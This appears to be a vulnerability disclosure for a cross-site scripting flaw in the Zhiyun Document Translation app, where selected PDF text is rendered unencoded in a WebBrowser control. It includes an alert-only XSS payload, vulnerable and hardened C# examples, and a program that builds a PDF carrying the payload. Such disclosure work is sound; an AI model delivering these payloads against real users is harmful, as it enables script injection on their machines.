This article will be used to apply for a CVE ID, so the full text is in English.
The vendor's official introduction of the software is:
Zhiyun Document Translation is a tool produced by the Zhiyun Document Reading public account to help researchers read PDF documents. With it you no longer need to copy text from the PDF into a web page for translation, which greatly improves the user experience and reading efficiency. While improving comprehension of the literature, it also helps improve English proficiency. The software integrates multiple translation engines, so you can always find one you like. It supports Chinese-English translation, reading and translating PDF documents, and an input translation mode.
The version I tested is V6.2.0; the software is written in C#.
The software's code has been obfuscated. Although running the PoC does not require deobfuscation, understanding the vulnerable code does, so I deobfuscated the software with de4dot.
The vulnerable code is in namespace pdf > class Form1 > method 翻译 (translate):
After receiving the user's input, the text is concatenated, without any filtering or encoding, into the HTML that is assigned to documentText and rendered in webBrowser1.
If the user enters <script>alert(/xss/);</script>, the script is rendered as part of the page and the XSS is triggered.
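The following is an added example written for this article; it is not the application's deobfuscated code, and the class, method and variable names are hypothetical. It reproduces the pattern described above (untrusted text concatenated straight into the HTML string that is handed to webBrowser1.DocumentText) next to the hardened version, which HTML-encodes every untrusted string before it enters the markup. The translation engine's reply is external input as well, so it is encoded too.

```csharp
// Added example, not the Zhiyun application's code. The method and variable
// names are hypothetical; the pattern (user text concatenated into HTML that is
// assigned to webBrowser1.DocumentText) is the one the article describes.
using System;
using System.Net;

static class TranslationView
{
    // Constructed sample: the text a user selects in the PDF viewer.
    public const string SelectedText = "<script>alert(/xss/);</script>";

    // Vulnerable: both strings are placed in the markup without encoding,
    // so any HTML in the selected text is parsed and executed by the control.
    public static string BuildDocumentTextUnsafe(string selected, string translation)
    {
        return "<html><body>"
             + "<p class=\"src\">" + selected + "</p>"
             + "<p class=\"dst\">" + translation + "</p>"
             + "</body></html>";
    }

    // Hardened: HTML-encode every untrusted string before it enters the markup.
    // The translation engine's reply is external input too, so it is encoded as well.
    public static string BuildDocumentTextSafe(string selected, string translation)
    {
        return "<html><body>"
             + "<p class=\"src\">" + WebUtility.HtmlEncode(selected) + "</p>"
             + "<p class=\"dst\">" + WebUtility.HtmlEncode(translation) + "</p>"
             + "</body></html>";
    }

    static void Main()
    {
        string translation = "(constructed translation engine output)";

        string unsafeHtml = BuildDocumentTextUnsafe(SelectedText, translation);
        string safeHtml = BuildDocumentTextSafe(SelectedText, translation);

        // Quick check that runs without WinForms: the raw tag survives in the
        // unsafe page and is neutralised (&lt;script&gt;) in the safe one.
        Console.WriteLine("unsafe page contains <script>: " + unsafeHtml.Contains("<script>"));
        Console.WriteLine("safe page contains <script>:   " + safeHtml.Contains("<script>"));
        Console.WriteLine(safeHtml);
        // In the application the string is assigned to webBrowser1.DocumentText.
        // The WinForms WebBrowser control renders it with the Internet Explorer
        // engine, which executes the embedded script in the unsafe case.
    }
}
```

Encoding at the point where the string enters the markup is the fix to look for when reviewing the patched method: checks on the PDF text alone are not enough, because the translation engines return text the application does not control either.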
Because the software's input must be a PDF, the payload is delivered through the document: write the XSS statement into a PDF, open that PDF in the software, and select the JavaScript text with the mouse so that the software translates it; the translation view then renders the script and the XSS fires.
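As an added example, not one of the files from the repository linked below, the following C# program writes a single-page PDF whose only text is the payload, so the text selected in the viewer is exactly the script tag. The output file name xss.pdf is an assumption. The one detail that matters when hand-building the file is that the payload contains parentheses, which delimit PDF literal strings and must be escaped, otherwise the content stream is malformed and nothing selectable is drawn.

```csharp
// Added example, not the PoC from the repository the article links to. Writes a
// minimal PDF 1.4 file whose only text is the payload. The output file name is
// an assumption.
using System;
using System.Collections.Generic;
using System.IO;
using System.Text;

static class PayloadPdf
{
    // '(' ')' and '\' delimit or escape inside a PDF literal string; the payload
    // contains parentheses, so they must be escaped or the text is not rendered.
    public static string PdfEscape(string s) =>
        s.Replace("\\", "\\\\").Replace("(", "\\(").Replace(")", "\\)");

    // Catalog, page tree, one page, one content stream drawing the text in
    // Helvetica, and a correct xref table so strict readers accept the file.
    public static byte[] Build(string text)
    {
        string content = "BT /F1 12 Tf 72 720 Td (" + PdfEscape(text) + ") Tj ET";
        var objects = new List<string>
        {
            "<< /Type /Catalog /Pages 2 0 R >>",
            "<< /Type /Pages /Kids [3 0 R] /Count 1 >>",
            "<< /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] "
              + "/Contents 4 0 R /Resources << /Font << /F1 5 0 R >> >> >>",
            "<< /Length " + content.Length + " >>\nstream\n" + content + "\nendstream",
            "<< /Type /Font /Subtype /Type1 /BaseFont /Helvetica >>",
        };

        var pdf = new StringBuilder("%PDF-1.4\n");
        var offsets = new List<int>();
        for (int i = 0; i < objects.Count; i++)
        {
            offsets.Add(pdf.Length);   // byte offset: everything written here is ASCII
            pdf.Append(i + 1).Append(" 0 obj\n").Append(objects[i]).Append("\nendobj\n");
        }

        int xrefOffset = pdf.Length;
        pdf.Append("xref\n0 ").Append(objects.Count + 1).Append('\n');
        pdf.Append("0000000000 65535 f \n");          // each entry is exactly 20 bytes
        foreach (int off in offsets)
            pdf.Append(off.ToString("D10")).Append(" 00000 n \n");
        pdf.Append("trailer\n<< /Size ").Append(objects.Count + 1).Append(" /Root 1 0 R >>\n");
        pdf.Append("startxref\n").Append(xrefOffset).Append("\n%%EOF\n");

        // ASCII keeps char offsets equal to byte offsets; a non-ASCII payload would
        // need a different string encoding and offset calculation.
        return Encoding.ASCII.GetBytes(pdf.ToString());
    }

    static void Main()
    {
        const string payload = "<script>alert(/xss/);</script>";
        File.WriteAllBytes("xss.pdf", Build(payload));
        Console.WriteLine("wrote xss.pdf; open it in the application and select the text to translate");
    }
}
```

Run it as a console project, then open the resulting xss.pdf in the application and select the line of text for translation, as described above. The viewer's text extraction must return the characters verbatim for the copy-and-translate round trip to preserve the tags; if a reader re-encodes or drops the angle brackets, the payload never reaches the HTML.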
Files and PoC have been uploaded to GitHub: https://github.com/WWILLV/zhiyun-xss